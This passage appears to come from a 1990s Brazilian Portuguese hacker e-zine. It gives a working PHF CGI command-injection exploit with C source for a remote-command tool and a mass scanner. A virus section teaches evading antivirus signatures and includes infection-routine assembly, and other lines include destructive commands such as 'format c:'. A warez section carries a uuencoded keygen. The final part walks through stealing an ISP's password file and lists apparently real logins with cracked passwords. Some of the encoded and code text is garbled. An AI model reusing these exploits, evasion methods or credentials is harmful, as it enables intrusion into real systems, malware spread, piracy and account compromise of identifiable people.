                    so que ele nao bloqueia o "\n" (%0A)
           

           strcat(commandstr, serverstr);
           strcat(commandstr, " ");
           }
        escape_shell_cmd(typestr);
        strcat(commandstr, typestr);
        if (atleastonereturn) {
           escape_shell_cmd(returnstr);
           strcat(commandstr, returnstr);
        }

        printf("%s%c", commandstr, LF);
        printf("
%c", LF);

        phfp = popen(commandstr,"r");
        
        bingo... como voces podem ver... ele simplesmente sai concatenando 
	strings e executa toda a meleca....

        send_fd(phfp, stdout);

        printf("
%c", LF); } 2) Explorando o BUG! Bom pra explorar o bug, eh muito facil... Olhando diretamente os fontes do programa, ele requer somente que um dos parametros seja passado para que ele resulte uma saida favoravel. csh:~/hack/phf-project$ telnet imbecil.com.br 80 Trying 127.0.0.1... Connected to imbecil.com.br. Escape character is '^]'. GET /cgi-bin/phf?Qalias=csh%0Aid

Query Results

/usr/local/bin/ph -m alias=csh id

	uid=65535(nobody) gid=65535(nogroup)
	
Connection closed by foreign host. csh:~/hack/phf-project$ BINGO!!! isso significa que o servidor esta sendo rodado pelo user nobody, grupo nobody.... pretty simple, huh? 3) Ferramentas de exploitacao: BOM, escolhi alguns utilitarios que sao muito utils no dia a dia do phf. Todos escritos por um amigo meu, o vandalz do #hack da efnet! :)) a) phfcmd : Para vc nao precisar usar telnet nem ter que decorar akele GET. Usage: phfcmd Exemplo: phfcmd localhost cat /etc/passwd b) phfscan: Scanear uma lista de hosts a procura de PHFs... Usage: phfscan Exemplo: phfscan arquivo.com.todos.os.COM.BR -------8<------8<-- phfcmd.c --8<------8<----- /* PHf COMMAND ][ ***** Executes remote comands in phf apache hole!! Coded by: Vandalz Greetz: Life Suckz! This is pretty simple.. Compile, port it if your system ... if you know how to do that, you're not intended to use this... */ #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif int TIMEOUT = 1; void sig_handler( int signo) { TIMEOUT = 0; } main (int argc, char *argv[]) { char host[100], buffer[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0A"; outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname ( argv[ 1]); strcpy( buffer, PHFMessage); for ( c=2; ch_addr_list[0], sizeof (outgoing.s_addr)); strcpy ( host, inet_ntoa ( outgoing)); serv_addr.sin_addr.s_addr = inet_addr ( host); serv_addr.sin_port = htons (80); /* Timeout on server */ signal( SIGALRM, sig_handler); TIMEOUT = 1; alarm(10); X=connect ( outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if ( TIMEOUT && !X) { write( outsocket, buffer, strlen( buffer)*sizeof( char)); while((X=read(outsocket,buffer,8096))!=0) write( 1, buffer, X); close ( outsocket); } return 0; } -------8<------8<-- phfcmd.c --8<------8<----- -------8<------8<-- phfscan.c --8<------8<----- /* PHf SCAN ][ ***** Scans to find phf apache hole!! Coded by: Vandalz Greetz: Life Suckz! This is pretty simple.. Compile, port it if your system ... if you know how to do that, you're not intended to use this... */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #define HTTPD_PORT 80 int timeout = 0; int sig_handler( signo) int signo; { timeout = 1; } /* some routines I made long time ago... but still useful!! ;) */ /* socket reading writing stuffs... */ /* pretty simple!!! */ /* (p)vandalz, 1996 */ #define SOC_BUFF_SIZE 2048 char soc_buff[ SOC_BUFF_SIZE]; char *soc_ptr; int soc_len=0; int soc_readln( soc, str) int soc; char *str; { char b; /* reads a new buffer */ if ((soc_len==0)||(soc_ptr>=soc_buff+soc_len)) { soc_len = read( soc, soc_buff, SOC_BUFF_SIZE); soc_ptr = soc_buff; if (soc_len == 0) { *str = 0; return -2; } #ifdef DEBUG fprintf( stderr, "read %d from socket.\n", soc_len); fflush( stderr); #endif } while (1) { b = *(soc_ptr++); if (b == '\n') break; *(str++) = b; /* reads another buffer from socket */ if (soc_ptr>=soc_buff+soc_len) { soc_len = read( soc, soc_buff, SOC_BUFF_SIZE); soc_ptr = soc_buff; if (soc_len == 0) { *str=0; return -2; } #ifdef DEBUG fprintf( stderr, "read %d from socket.\n", soc_len); fflush( stderr); #endif } } *str = 0; } soc_writeln( soc, str) int soc; char *str; { write( soc, str, strlen( str)); } /* (p)vandalz, 1996 -- socket_writeln, socket_readln, bufferized */ int checkphf( soc) int soc; { char phfMSG[]="GET /cgi-bin/phf?Qalias=die%0Aid\n"; char tmp [256]; int ok=0; soc_writeln( soc, phfMSG); tmp[ 0]=1; while ((tmp[0]!=0)&&(!strstr( tmp, "Query"))) { soc_readln( soc, tmp); #ifdef DEBUG fprintf( stderr, "<==[%s]\n", tmp); #endif } if (!strstr(tmp, "Query")) { printf("no phf found!\n"); return -1; } while( tmp[0]!=0) { soc_readln( soc, tmp); #ifdef DEBUG fprintf(stderr,"<==[%s]\n", tmp); #endif if (strstr( tmp,"uid")) { printf("PHF (%s)\n", tmp); ok = 1; } } if (!ok) printf("PHF found, but cant exploit it!\n"); return 0; } main( argc, argv) int argc; char *argv[]; { struct sockaddr_in server; struct hostent *hp, *gethostbyname(); char hosts[ 1024]; int phfsoc; FILE *sl; if (argc<2) { printf("usage: %s \n", argv[0]); exit( -1); } sl = fopen( argv[1], "rt"); if (!sl) { printf("could open site list file!!\n"); exit( -1); } while( !feof( sl)) { hosts[ 0]=0; fgets( hosts, 1024, sl); if (hosts[ 0]) { phfsoc = socket( AF_INET, SOCK_STREAM, 0); soc_len = 0; server.sin_family = AF_INET; hosts[ strlen( hosts)-1] = 0; hp = gethostbyname( hosts); printf("%s ", hosts); if (hp) { bcopy( (char *)hp->h_addr, (char *)&server.sin_addr, hp->h_length); server.sin_port = htons( HTTPD_PORT); timeout = 0; signal( SIGALRM, sig_handler); alarm( 10); /* ten seconds time out!! */ if (connect( phfsoc, (struct sockaddr *)&server, sizeof( server))==0) { /* we are connected at the server!! */ /* Do what we should do!! */ alarm( 0); checkphf( phfsoc); fflush( stdout); } else { alarm( 0); if (timeout) printf( "timed out!\n"); else printf("conection refused\n"); } } else printf("no such host!\n"); } close( phfsoc); } } -------8<------8<-- phfscan.c --8<------8<----- Mais uma producao de csh, hackeando para um mundo melhor! }-===============================[chain]===============================-{ 14-) VIRII - Mutacao Virotica Simples & Pesquisa de Diretorios ~~~~~ ~ ~~~~~~~ ~~~~~~~~ ~~~~~~~ ~ ~~~~~~~~ ~~ ~~~~~~~~~~ Oi, sou o Worm_root, ou Spider, p/ os q me conhecem, eu sou o editor da Cyber-Demons, e membro do VBB(Virus Bit & Bytes) e agora, eu tambem faco parte desse grupo(eu acho ;)...eu fiquei encarregado de escrever a parte sobre virus... espero q gostem e divirtam-se... Se o Acid deixar, de vez em quando eu escrevo outras coisas tambem... :) P.s.: Facam o q quiserem com as informacoes aqui contidas, de preferencia, se for um virus, nao o distribua sem antes entender o codigo, isso eh lamer... se nao entendeu... aprenda, ou -> echo y|format c: P.s.2:Se vc usa o Virus Generator, ou qualquer uma dessas merdas de cri- acao de virus, aki vai um conselho: deltree /y c:\*.* >null Mutacao virotica simples: ~~~~~~~ ~~~~~~~~ ~~~~~~~~ He he he... curtirao o nome?? Bem, ao contrario do titulo a coisa eh sim- ples, trata-se de como pegar um virus ja existente e criar um outro, uma VARIANTE. Porq? Qual a utilidade? Sei la!! Bem.. quero dizer... existem algumas utilidades... ao inves de criar um codigo totalmente novo, vc simplesmente modifica um ja existente e produz um melhor. Mesmo porq, criar um virus inteiro cansa, enche o saco, e muitas vezes vc vai testa- lo, e vai ver q seu anti-virus o detecta e o acusa como sendo um virus ja existente. Vc vai pensar "###&*riu!! Eu criei um virus inteiro e esse merda de anti- virus me diz q ele ja existe?!? Porq?" simples, porq os virus ja estao es- tagnados... o ambiente MS-DOS eh muito aberto, milhares de pessoas fizeram virus p/ eles, entao, fica dificil vc conseguir criar algo realmente novo... Vamos comecar: Talvez muitos de vcs possuem em seus computadores, algum tipo de codigo de virus famoso, como por exemplo o Trojector. Talvez tambem, algum dia vc decida dar vida ao dito cujo, mas percebe que qualquer anti-virus merrequinha pode detecta-lo, o que vc faz? Chorar(vc eh viado)? Nao, vc le nossa revista, Ha ha ha... Ta legal, vamos voltar ao papo serio, neste artigo, vc aprendera como TEORI- CAMENTE vc pode fazer um virus ja conhecido se tornar novamente nao detecta- vel. Teoricamente, porque as vezes esse tipo de coisas torna-se tao macante que e mais facil criar um novo virus. Se vc ja "pegou" a coisa, vc deve ter compreeendido, que dessa forma vc ira gerar o que nos chamamos de variante, isto eh,se vc alterou o Trojector(que e muito comum) de forma que ele fique novamente indetectavel, vc com certeza criou uma das trilhares de variantes desse virus! Vamos a parte tecnica ---> Para fazer isso vc precisa de algumas ferramentas especiais: * Norton Utilites (ou qualquer outro bom editor hexadecimal). * Debug (nao e necessario, mas facilita). * Turbo Debugger da Borland. 1-) Crie um arquivo bite com o Debug. Arquivos bite, sao arquivos usados por pesquizadores de AV(anti-virus), para fazer os virus contaminarem estes ar- quivos, que depois serao usados para estudar o virus. Por exemplo, suponha que vc fez um arquivo bite que possui uma unica instrucao: INT 20H E claro que se vc contaminar esse arquivo com um virus, tudo, MENOS O 'INT 20H' formam o virus original! Note que alguns virus nao contaminam arquivos bite(isso ja foi discutido anteriormente). Para fazer um arquivo bite, use o Debug ou seu compilador assembler, os co- mandos abaixo podem ser digitados diretamente no debug, mas eu aconselho que vc digite tudo abaixo do tracejado e depois use o debug para "compilar" esse arquivo, dessa forma vc elimina qualquer erro de digitacao. Ok, crie um arqui- vo chamado BITE1.SCR e nele digite as seguintes linhas: n BITE1.com ; Criar um arquivo chamado Bite1.com. a ; Entrar no modo assembler. int 20 ; Instrucao do programa, apenas termina o programa. rcx ; Especificar o tamanho do arquivo. 2 ; Tamanho do arquivo. w ; Grava. q ; Sai. ; ANTES DE CRIAR O ARQUIVO RETIRE TODOS OS COMENTARIOS ; ACIMA!! Depois use o Debug para transformar esse arquivo em uma executavel, digite: DEBUG < BITE1.SCR Isso criar um arquivo de 2 bytes chamado BITE1.COM. Os comentarios e os ';' devem ser retirados antes de se criar o arquivo!!! Se vc quiser digitar o nome do arquivo, tudo o que ocorrera eh o termino do arquivo, visto que a unica instrucao de nosso arquivo e uma "int 20h"->para terminar a execucao de um programa. 2-) Contamine o arquivo com o virus. Se for um virus de BOOT, de um jeito, mas vc tem que contaminar esse arquivo de 2 bytes, do contrario, pode es- quecer... CUIDADO PARA NAO CONTAMINAR O SEU HD! Faca a coisa em um disquete! Nao se esqueca de manter uma copia do Bite1 original(sem o virus!!). Se for um virus de arquivos Exe, de um jeito de converter seu arquivo BITE1. COM para BITE1.EXE, NAO BASTA RENOMEA-LO, vc tem de criar um Exe. 3-) Carregue DISKEDIT, que vem com Norton 6.0 (que eu nao tenho.. :-( ) ou o editor hexadecimal do PCTOOLS ou ainda o Hiew(eu gosto muito pois ele e muito facil de usar). Em sua tela vc tera entao o codigo hexadecimal do arquivo infectado. Agora, ache atraves do editor hex., o meio do arquivo, se ele tem 14k, se dirija para o ultimo byte, antes de formar 7k. Preencha os 7k em diante com besteira, como por exemplo 255d (FFh) o caractere de espaco. Agora, execute o SCAN, se o SCAN detectar o virus, e porque a sequencia da assi- natura esta entre 1b e 7k, do contrario, a sequencia esta entre 7 e 14k, simples hein? Dessa forma, basta vc ir "picando" o arquivo que logo logo vc achara a assinatura. E por isso que antes de alterar os arquivos, e bom vc ter copias reservas do BITE1.COM limpo(s/ virus) e do contaminado. Salve e volte para o Dos. Use o SCAN para procurar pelo virus, nos usamos o SCAN pois ele apenas pro- cura por assinaturas, e e' isso que nos estamos tentando modificar. Se o SCAN encontrar o virus, e porque vc ainda nao deletou a string pela qual o virus e identificado. Entendeu ? PELO AMOR DE DEUS, TENHA EM MENTE QUE A VERSAO DO SCAN QUE VC IRA USAR, DEVE ENCONTRAR O CODIGO DO VIRUS QUE VC ESTA TENTANDO ALTERAR, ISTO E, O QUE ADIANTA VC ALTERAR O CODIGO DE VIRUS SE O SEU ANTI-VIRUS NAO E CAPAZ DE LOCA- LIZA-LO ?!? DESSE JEITO VC NUNCA IRA SABER SE FUNCIONOU POIS O SCAN NUNCA VAI ENCONTRAR SEU VIRUS NEM O ORIGINAL (O QUE VC ESTA MODIFICANDO). Por exemplo, quando procura pelo virus Cascata, o SCAN procura por algo pare- cido como: EB1DAD1273D1FF121F (Eu achei isso numa revista) Entao meu caro, vc esta tentando apenas alterar a string que o SCAN usa para detectar seu virus. Tudo o que vc tem a fazer e ir deletando partes do virus ate que o SCAN nao detecte mais o seu virus alterado. E claro que deletando partes do virus, ele nao ira funcionar(pois o arquivo estara com pau), mas nos nao estamos querendo ele funcionando, nos estamos apenas querendo saber que parte do virus e detectada pelo SCAN(por enquanto, he, he, he...) Em 75% dos virus, a assinatura(os bytes identificaveis pelo SCAN) esta nos primeiros 150 bytes do arquivo. Ok, supunhetemos que vc tenha achado a assinatura, e ela seja algo como: B8 92 19 B7 21 CD As assinaturas sao mais compridas, isso e apenas um exemplo... Volte ao debug, e digite: DEBUG E 0100 b8 92 19 b7 21 cd ; Isso e a string achada. U ; Isso ira converter a string achada para o seu ; codigo assembler original, nesse exemplo, essa ; string eh: mov ax,1992h mov bx,21h int 21h VC TEM QUE PELO MENOS TER UMA NOCAO DE ASSEMBLER PARA SABER COMO FAZER ESSE TIPO DE COISA. Use o Turbo Debugger ou o Debug para fazer a seguinte coisa: Isso e o que vc tem na tela: mov ax,1992h mov bh,21h int 21h Agora, tente mudar a ordem dos comandos para por exemplo: mov bh,21h mov ax,1992h int 21h A 'INT 21H' TEM SEMPRE DE FICAR NA ULTIMA LINHA! ISSO EH OBVIO. Agora, provavelmente o SCAN nao mais ira achar o virus!! FACIL!?!?!!! You see? You didn't change the way the code functions (THATS IF YOU KNOW WHAT YOUR DOING!) but you changed the codes id-string for SCAN. Como o Turbo Debugger nao permite salvar as mudancas, use o Debug para is- so, entao digite: DEBUG BITE1.com ; Arquivo com o virus. a 0122 ; Endereco de onde esta a string achada. Entao entre com as instrucoes: mov bh,21 mov ax,1992h int 21h w ; Grava. q ; Sai. Scaneie o arquivo, se o SCAN nao achou, entao vc conseguiu, caso ele en- contre, tente alterar essas instrucoes por outros comandos mas de forma a produzir o mesmo resultado. OBS.: Isso so funciona para virus nao encriptados, ou em seus mecanismos de encriptacao(que na maioria das vezes sao scaneados pelos AVs). Caso vc tenha o codigo do fonte do virus, a coisa fica bem mais facil, vc o modifica, compila, e depois roda o SCAN, e modifica algumas partes do co- digo ate ele voltar a ser indetectavel. Pesquisa de diretorios: ~~~~~~~~ ~~ ~~~~~~~~~~~ Infelizmente, eu to mto ocupado, por isso nao tive tempo de achar nenhum codigo p/ a revista... por isso, p/ os q ja manjam da criacao de virus, eu vou mostrar uma pequena rotina, desenvolvida por mim, com o proposito de realizar busca por diretorios. A coisa funciona assim, ao inves do seu vi- rus simplesmente descer um diretorio('..'), ou ir p/ o raiz, ele ira pro- curar por mais diretorios onde possa entrar e contaminar... Com esse sis- tema, mesmo q o virus fique apenas no raiz C:\ , ele acabar infectando o sistema todo, o q nao ocorre com muitos virus existentes por ai... O codigo ta pode ser melhorado, mas demorou-me 1 semana de pesquisas.. :( Inicio: call GET_DTA ; Seta novo DTA push dx ; Salva mov ah,1AH ; Seta DTA int 21H mov ah, 04eh ; Funcao procurar pela 1. ocorrencia de arquivo mov cx, 00010001b ; "Atributo" dos diretorios :) lea dx, maske_dir ; Mascara p/ diretorio int 21h ; jc Erro ; Erro, aborte pop bx ; Get pointer to search table (DTA) test BYTE PTR [bx+15H], 00010001b ; Eh um diretorio ? jz Find_next ; Nao, ache outro cmp BYTE PTR [bx+1EH],'.' ; Eh um padrao('.' e '..')?? jne Real ; Nao, eh um diretorio real! GET_DTA: ; mov dx,OFFSET DTA2 ; mov al,2BH ; add dx,ax ; Return with dx= proper dta offset ret ; DTA2 db 56H dup (?) ;dta for directory finds (2 deep) maske_dir db "*",00 ; search dir's A rotina por si so eh muito simples, notem q vcs terao de "encaixa-la" no seu virus.. isso eh apenas a funcao de demonstracao... Essa funcao a- penas procura por diretorios, mas tenho certeza q c vc a entendeu, nao tera dificuldade em fazer o virus ascessar o diretorio achado.. so se lembre de antes salvar o diretorio original p/ q depois o virus possa voltar sem ser detectado. Na proxima edicao, um guia simples sobre como escrever seus primeiros vi- rus .COM e .EXE Spider/Worm_root P.s.: A materia sobre modificacao de virus foi tirada da minha revista, a Cyber-Demons numero 1. A numero 2, foi resultado de pesquisas minhas... }-===============================[chain]===============================-{ 15-) WAReZ ZONe ~~~~~ ~~~~ ---------------------------------------------- - MnEuMoNiC's Overview About Warez & Related - ---------------------------------------------- Knowledge is Never a Crime. [ 2600 Magazine ] Bem, comeco escrevendo para o Zine AXUR05 declarando que nao sou uma autoridade no assunto (como a maioria de nos nao pode negar) e tenho MUITO a aprender. Apenas tenha em mente que os conhecimentos que coloco `a disposicao neste artigo sao somente com propositos educacionais e que todos os prejuizos que qualquer pessoa venha a sofrer, baseando-se ou nao neste artigo, sao de inteira e completa responsabilidade dele mesmo. Aqui pretendo apresentar informacoes iniciais de como conseguir informa- coes sobre os falados `Warez' ou como conhecemos no Brasil, -pirataria-. Mas voce pode estar se perguntando PORQUE publicar um artigo como este se a pirataria e' ilegal? E' este o meu objetivo aqui: mostrar o lado bom e o mau do Warezing. Voce realmente compraria um software especifico com alto preco sem co- nhece-lo? Ou voce buscaria alguem que ja' o possui, pediria informacoes e, talvez se gostasse, o compraria? Esta segunda opcao e' realmente a recomen- dada... Mas porque que quando buscamos um programa, somos OBRIGADOS a com- pra-lo, testa-lo, e se nao gostarmos, tentar vender (acho dificil alguem querer comprar pelo mesmo preco...). Nao seria justo da parte das empresas a liberacao de seus softwares, para fins de testes, antes da compra propri- amente dita? Ja' que o mercado nao assimilou tal ideia, e' para isto que existem os Wa- rez Groups (grupos expecializados em distribuicao dos Warez), Warez Boards, Couriers e os News Groups relacionados a Warez. Sao os Warez Groups (como PWA, RiSC, DoD, etc...) que 'captam' os warez e distribuem atraves de sitez ftp com ajuda dos Warez Boards (existem MI- LHARES deles em todo o cyberspace!) e atraves dos Couriers que distribuem no iRC ou em seus BBSs. Mas sao nos News Groups onde encontramos a maior quantidade de informacao reunida, e e' por isso que coloco abaixo a lis- ta dos grupos de discussao mais famosos na area... alt.binaries.warez.ibm-pc alt.binaries.warez.ibm-pc.old alt.binaries.warez.ibm-pc.d (d = discussion) alt.warez.ibm-pc.apps alt.warez.ibm-pc.games alt.warez.ibm-pc.old alt.cracks alt.crackers Note que nem todos os repositorios de news possuem estes grupos, ou seja, procure os sites de acesso free e que possuam estes grupos. Se o seu pro- vedor em servico de news com estes grupos, sorte sua! Senao, use este aqui que e' free, mas MUITO lento (ta' achando que vou te dar um servidor de news free e rapido, e'?) - [ wisipc.weizmann.ac.il ] Para a leitura e postagem dos mails em News Groups, recomendo o Forte Free Agent V1.0 ( http://www.forteinc.com/forte ). Agora e' so' ralar, ler muito e dar uma pesquisada tambem nos canais #wa- rez, #warezwarez, #warez666 e outros relacionados na EFNet, DALNet e ou- tras tantas redes de iRC pelo mundo. Nao se esqueca que NADA e' de graca e ninguem vai te dar nada em troca... Nothing is free, ok? De presente, uuencoded ai' em baixo, o Key Generator do Free Agent, ok? ---------------------------------------------------------------------------- section 1 of uuencode 5.21 of file fagentkg.zip begin 644 fagentkg.zip M4$L#!!0``@`(`!RN.R+";G&%LP$``-D#```+````1DE,15])1"Y$25JMDK%N MVS`0AGH<_:P"3[9JIAA*[::O60('NM,/$0FVI$&@;>2Z/[9BA'?($),4G M*#*+@Y`CY=0:4K1##B)QO/OOXT]`:?+K?C1JO0>%A_?M:'1W1]^_(JCB7#\9 MY^Z_I\F>3BTL##RCM*$$QA@PF!;&#GN'B)(N9,;X8(*1/%+W/T.>)TN"T.:]TCC(E[K#SU:+'F*+'1M(UN3$>W_L$Y1\B.[@@9 M/0LA/>S''LB"ZPZ24/"]+`K=X+'/QEL^XV/^A><\XY?\G$XG_`.?\$_\Y&\C MA/OY@C_*#W+GD9<7F_SW0Y'A?R*JJX]%]B:[G8OQ5JP*,5_)YU'35347*YQ7ZZ(4JJA*7)8+AERN"1QQ+_S8-)E4M9*8 MU%)B?"-+A>UK]@JGP>Q4EK(6JJI/TV0J%=12XO-2U')'"T*=I5M:,7&5HV=8&64AB2KJ? MBFSF4V5/!F'F0$5-N;]S=;_U^^-W>;T.G',^W^_W?;_?<[ZL7%N#8```"FAE M$$0Q``@`H\#PLW(M0!;&Q402Q&I2@'3"?5>@!KD4,.,)0UY[&VAD#5P%T#BQ M`%=!T;!SF4#Z1Q&U[I7COK%59N3B;+B(LIE@\,!KP!*\8R_=@]+J;! M]0.VB_@C89LK5P*G152CA8MXT37K$]?]+5WE7!;BK+FW$R.%%<*74`CG4&CB M(I@+*>1H_Y$:S`8S20'E>#`>2H$D6E]D@K"<^O3-L!+\SS-D)6M(H<$M%0*J M9,TDHL3KE4SFV2Z3^';(\%JX``!U(BBK%KIC^00\_3J/F6UUD!SSD]P MJN<9VTP8,I_X.'4"H]->7\R[:;J*X'KA712U!]F3J0?*X6FY:%&1H(\`0YL6 M9=Y`"$(@9.H4%1#PO3A:OAQFA4MX40J$99C,*&^6Z^8C((U>@86H`;!$DZ\$ M\!H-$'`(O^H!@SD%N6C+,V\D2`$%6&A9PTKH;M@QA:/UZTT=O\;KG6?2(8T[ MK)/5RAOZY;`*.*S"6X(;HHXCCX0@9($:24,Y6AVF`MY\+YC^_]H[E"19G;SI MEE4F\;0JT5J)9Y=RN<2S1\G09CB1]4`&:#KW^Y6X/K=7B=<: M7TD\>Y6W",+XU%[W8:DN"]?&X&RK,HC=HTSAXHE`>(\B@7/<@E<:GS&\>I5^ M>GNC\;6$W:L4FEGV1@FSGS27ZHU/<1WI8IV.'Q6I`F"7DZ-,RH,5#"7N6&5Q MAYZG4E=^QP-K$^(LEZ-61YIF$&OC$V#&G0GF@#*-&F^N=A@KI9Y6F;&4P*Q* MP5VZ96I6+`[I.D+;46\C.MBN235@V_YF2"EJB#`]XI,-.E]0$]60;84_9.%]8CPC8'[L_H MV>\^M/+^NY6,%M*2](*7VQL2=?\P,"%!0,]0^"*ZY=>HU:8$!_E"&0_CS:@# M7C",O.U4!5M$7B1_$7F1`D0R>,UR_46F'8X@C"U*1G/AMKYDM@@-88O\>O$W M`P%:6SZ<(QG:A^98W>">//*=Y=^%`Q&9XG5H5)^"HGP%=YP))L(*`0YCZ5Q%&- M`*:G@T%8J!CB0+F^Y*@$#0D50QS[,,Y129`CA5L<)C%M-+64$UP8^Z@$`H:*3?3_`WA!2@)> ME)+Y^4E*`I7H96HW,,#1VJ[B7+C1@;*A2*N<[P:2X>7!&PS/"+%>%M2=W)X+ MO[`+TM0QG#I-I4SM"O"F`F,K6AMD3!G!J$MU@OFR+%ZVS\RH2^LBN!>DJLM2 M2')1RC2=)5%PN.3'U$!EFKNH#.\5E:&$H+I7<@PX!&TTO%^HHPA+J5%K#":^Z0(1-Q((UB<( M*RBF$X3N[_\*3.%-)?,RB4HV8!_J4+D(HL2;H@8(;*=XB`\U`F=[4Z7C>HP! MA.$97B$6>U,,+R6'`3"\B4A_J?&FW((^0B91LPH8VMTL>*ZND@G$Q0"VNW1; MD#7Y)=E>7%Q!=8X/*+$_:FY>>[,@OWR@ON?&%6-AX9[HR-K3,0>^G)L08\A] M<#^?6=^1V+SP;,N_$^I:;&TR#S7*+#/-^VI74UIB^[S?QD]KO%>T?G<'HZ,I_^&8 MO.^U;C57:RY3O'^(/?^1RW>\OEFEF0OW#U1G;AY0548$1TYJ3J\Z&ZG.T4_V M"4Z/\WUA>1M@7B)IK#FV_/0?4R]VICT*,(R(/IT:N:MC7/6I\=PS=,D'I^<\ M#I^W7U+3V7WUDH"8L]Z]=8YS8V7?LARK1V'8R<:#\^?FO,IMN3*Y8_.DSQ>= MIFO.V_]Z1MO].-S\[9.W=RZX2AOLLF]T'U.,>=B*C5DT^A)#8]>//V1O'OU^ MMUG)_)G3BIO<7OX9,CTS:T/@J5$>GUXYY2]&N"LJ M\DY.'7UDR_;I8''%U+"]$>%/NF_&C/21JP+9!;,0+C_<4GG<96_A&>-)R>G" MCKMNX_;UOS MC5D=]3GL+\:URO?GL6?.J-_$BO2=55_E?&U_(81K1=*&8*%.GW&XH,7OL*R'WLM M?K0)CP[/\NA^/[XL*?I,@<^\55/9OZ,Y5:;*[UU^OO--+)=BBWO_-_;NGE0T=3#-\N7+(\REQ7<*;N:IK[BU9OXUZVF)(?M),<&^ M=J]ZZQ5T[&?,096C_%4D*BW]UV]W%]V?YI&K*YHS;90+=N+W+1LFLT:&GIB; M^.WF'7=+KE^_!#Q+;1;B;9;,UO?TJ+5@?GRW*#@_JWG"AYN2`L(P:917CPG5:XGSS[DU1\\LW7CW&UX]X.F?&V2;T+YE"GZ,[\ZW_![[M+< MN8>S;%7N3[%?;3X_-F?LE#6ZC-B8_HA`K^BX%9K\/7[:Z\:UA$?@SI.W(Z,R M'T^<-'HR>UN-?"SM[)A'T]]KW<\N*%R16UBZ=168.:+U=/*9XK,KB0QDO,\( M@(-P@(-SV]O;_B#YV]W>VR#?W"[? M^B#;_MO;W2#ZV]L@WMO;V_X@_B`@("`@(/G;W=[;(-O;("#>VR#=_B#;(-[; M(-\N("`@(+,-"K,@("#>VR#=WMW>V_H@WMO>WMT@WM_?_MP@V]W>V]T@WML@ MW=[=WMOZ("#V][>W2#>V_H@V]L@W-P@("#V]TN MWMT@V]O>V]T@WMO=(-[;V]O=("`@WMO<_M[;("`@LPT*LR`@(-_?("#;_M_? MWR#?WR#;_B`@W]_?("`@W]_?("#?WR`@V_[?W]\@(-_;W-_^(-_?(-O^(-_? MWR#ZW]_?("`@("#?W]_?("`@(+,-"K,@("`@("`@("`@("`@("`@("`@("`@ M("!(+U`O02]6+TTO0R])+T0O4"\A+TPO1B]/+R$@("`@("`@("`@("`@("`@ M("`@("`@(""S#0K(S2TM^?KZ("`@(/H@^OKY+2W$Q"W$Q,3$Q,3$Q,3$Q,3$ MQ,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$+<3$+2WY^OH@^B`@("#Z^ODM+<3-O`T* ML_H@36Y%=4WM[VE#("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@ M("`@($UN175-;TYI0T!#>6)Eftp ftp> open ginet.com.br Connected to ginet.com.br. 220 pingo FTP server (UNIX(r) System V Release 4.0) ready. User (ginet.com.br:(none)): anonymous 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -la 200 PORT command successful. 150 ASCII data connection for /bin/ls (200.???.???.??,2475) (0 bytes). total 14 drwxr-xr-x 6 0 1 512 Nov 15 20:50 . drwxr-xr-x 6 0 1 512 Nov 15 20:50 .. lrwxrwxrwx 1 0 1 7 Nov 15 20:50 bin -> usr/bin dr-xr-xr-x 2 0 1 512 Nov 15 20:50 dev dr-xr-xr-x 2 0 1 512 Nov 15 20:50 etc drwxrwxrwx 7 30000 1 512 Jan 8 19:19 pub drwxr-xr-x 5 0 1 512 Nov 15 20:50 usr 226 ASCII Transfer complete. 431 bytes received in 0.60 seconds (0.72 Kbytes/sec) ftp> ftp> cd etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 ASCII data connection for /bin/ls (200.???.???.??,2476) (0 bytes). group netconfig passwd 226 ASCII Transfer complete. 26 bytes received in 0.00 seconds (26000.00 Kbytes/sec) ftp> ftp> get passwd 200 PORT command successful. 150 ASCII data connection for passwd (200.???.???.??,2477) (62 bytes). 226 ASCII Transfer complete. 63 bytes received in 0.06 seconds (1.05 Kbytes/sec) ftp> Bom! Ai ta o passwd, em alguns casos o shadow que contem as senhas en- criptadas. Esse e' o provedor onde os caras sao do tipo... burros demais! Agora que temos o arquivo com as senhas o que devemos fazer? Vamos desen- criptalas. Usem o crackerjack se vcs estiverem rodando em ambiente DOS, lembrem-se o cjack nao roda ao mesmo tempo que o ruindows95, entao inicie o prompt em modo de seguranca. Pronto, vou colocar uma sessao de crack nas senhas aqui abaixo. Cracker Jack version 1.4 for OS/2 and DOS (386) Copyright (C) 1993, The Jackal, Denmark PWfile(s) : c:\raiz\contas\ginet\passwd Wordfile : c:\hacking\diction.ary\axur Initializing session data... Loaded 52 total accounts with 50 different salts. Cracking... (Hit any key for status, Ctrl-C to abort) forest (forest) pinara (9871) Depois de exaustivo tempo larguei de mao, porra minha worlist menor tem 3 megas e nunca pegou tao poucas senhas assim, eu uso esta lista com pa- lavras do dicionario quando quero economizar tempo ;) pq uma lista gera- da bem fica com no minino 600 megas. Qual a primeira providencia que eu vou tomar? Vou renomear o arquivo passwd e depois limpar ele, usando os proprios lo- gins como palavras pra wordlist. gampert regis pinara rodinei patricia marcelo marcos fernando::9809:::::: debora:wu6RAjzsZPVmI:9810:::::: fredi:AOIaiY4qoNnjs:9818:::::: bstudio:I3ge9NrA610ck:9818:::::: bbborges:L2bpLO7gP7o7U:9818::::: setup --DEIXAR SOH O LOGIN-- :HB90Lijk05mpE:6445:::::: Vc soh deve deixar a primeira parte como eu fiz no exemplo acima. Ai entao nos vamos tentar novamente crackear o arquivo passwd soh que entendendo que os usuarios usam o login e a senha iguais. Hehehe.. bingo! Vou listar abaixo as senhas que eu peguei usando o metodo de login=senha Provedor: ginet.com.br login - senha - - - - - - bstudio - bstudio oab_pf - oab_pf nuhry - nuhry jtelles - jtelles demo1 - demo1 demo2 - demo2 demo3 - demo3 demo4 - demo4 demo5 - demo5 cmoura - cmoura glaucia - glaucia pedroso - pedroso cotrijal - cotrijal ameplan - ameplan guto - guto jmartins - jmartins lguedes - lguedes 